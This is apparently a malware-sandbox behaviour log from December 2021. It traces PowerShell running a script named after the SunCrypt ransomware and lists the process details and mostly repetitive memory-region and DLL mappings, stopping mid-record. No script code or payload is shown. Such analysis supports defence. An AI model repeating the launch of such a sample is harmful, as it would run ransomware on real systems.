# Flog Txt Version 1 # Analyzer Version: 4.4.0 # Analyzer Build Date: Dec 8 2021 20:04:45 # Log Creation Date: 27.12.2021 17:23:42.028 Process: id = "1" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x7ef47400" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x4ec" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -File \"C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1\" " cur_dir = "C:\\Windows\\system32\\" os_username = "MYB7ZA2AF\\5AlR3U30D3" bitness = "32" os_groups = "MYB7ZA2AF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e73d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 253 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 254 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 255 start_va = 0x40000 end_va = 0x7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 256 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 257 start_va = 0xd80000 end_va = 0xdeafff monitored = 0 entry_point = 0xd8d330 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 258 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 259 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 260 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 261 start_va = 0x7ffd7000 end_va = 0x7ffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 262 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 263 start_va = 0x90000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 264 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 265 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 266 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 267 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 268 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 269 start_va = 0x90000 end_va = 0xf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 270 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 271 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 272 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 273 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 274 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 275 start_va = 0x73bf0000 end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 276 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 277 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 278 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 279 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 280 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 281 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 282 start_va = 0x6fb70000 end_va = 0x6fbb9fff monitored = 1 entry_point = 0x6fb72e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 283 start_va = 0x100000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 284 start_va = 0x100000 end_va = 0x1c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 285 start_va = 0x1d0000 end_va = 0x1ecfff monitored = 0 entry_point = 0x1d1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 286 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 287 start_va = 0x1d0000 end_va = 0x1ecfff monitored = 0 entry_point = 0x1d1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 288 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 289 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 290 start_va = 0x370000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 291 start_va = 0xdf0000 end_va = 0x19effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 292 start_va = 0x1d0000 end_va = 0x1d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 293 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 294 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 295 start_va = 0x480000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 296 start_va = 0x200000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 297 start_va = 0x480000 end_va = 0x4dbfff monitored = 0 entry_point = 0x4a35b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 298 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 299 start_va = 0x480000 end_va = 0x4dbfff monitored = 0 entry_point = 0x4a35b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 300 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 301 start_va = 0x74870000 end_va = 0x748affff monitored = 0 entry_point = 0x7487a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 302 start_va = 0x560000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 303 start_va = 0x640000 end_va = 0x71efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 304 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 305 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 306 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 307 start_va = 0x76a80000 end_va = 0x776c9fff monitored = 0 entry_point = 0x76b01601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 308 start_va = 0x75fa0000 end_va = 0x75ff6fff monitored = 0 entry_point = 0x75fb9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 309 start_va = 0x74eb0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74eb1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 310 start_va = 0x75810000 end_va = 0x7581afff monitored = 0 entry_point = 0x75811992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 311 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 312 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 313 start_va = 0x490000 end_va = 0x490fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 314 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 315 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 316 start_va = 0x720000 end_va = 0x9eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 317 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 318 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 319 start_va = 0x74a20000 end_va = 0x74b14fff monitored = 0 entry_point = 0x74a30d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 320 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 321 start_va = 0x75c50000 end_va = 0x75decfff monitored = 0 entry_point = 0x75c517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 322 start_va = 0x75a80000 end_va = 0x75aa6fff monitored = 0 entry_point = 0x75a858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 323 start_va = 0x75b00000 end_va = 0x75b11fff monitored = 0 entry_point = 0x75b01441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 324 start_va = 0x4b0000 end_va = 0x4bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 325 start_va = 0x74c10000 end_va = 0x74c30fff monitored = 0 entry_point = 0x74c1145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 326 start_va = 0x778b0000 end_va = 0x778f4fff monitored = 0 entry_point = 0x778b11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 327 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 328 start_va = 0x4d0000 end_va = 0x4e5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 329 start_va = 0xb60000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 330 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 331 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 332 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 333 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 334 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 335 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 336 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 337 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 338 start_va = 0x9f0000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 339 start_va = 0x9f0000 end_va = 0xa4bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 340 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 341 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 342 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 343 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 344 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 345 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 346 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 347 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 348 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 349 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 350 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 351 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 352 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 353 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 354 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 355 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 356 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 357 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 358 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 359 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 360 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 361 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 362 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 363 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 364 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 365 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 366 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 367 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 368 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 369 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 370 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 371 start_va = 0xa50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 372 start_va = 0x71fa0000 end_va = 0x71febfff monitored = 0 entry_point = 0x71fa2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 373 start_va = 0x70670000 end_va = 0x7069dfff monitored = 0 entry_point = 0x70671bba region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 374 start_va = 0xa50000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 375 start_va = 0x70660000 end_va = 0x70668fff monitored = 0 entry_point = 0x7066153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 376 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 377 start_va = 0x500000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000008.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000008.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000008.db") Region: id = 378 start_va = 0x530000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 379 start_va = 0xba0000 end_va = 0xc05fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 380 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 381 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 382 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 383 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 384 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 385 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 386 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 387 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 388 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 389 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 390 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 391 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 392 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 393 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 394 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 395 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 396 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 397 start_va = 0xc10000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 398 start_va = 0x70a40000 end_va = 0x70aaffff monitored = 0 entry_point = 0x70a41f65 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 399 start_va = 0x756b0000 end_va = 0x756c8fff monitored = 0 entry_point = 0x756b1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 400 start_va = 0xc90000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 401 start_va = 0x70b00000 end_va = 0x70b0afff monitored = 0 entry_point = 0x70b01200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 402 start_va = 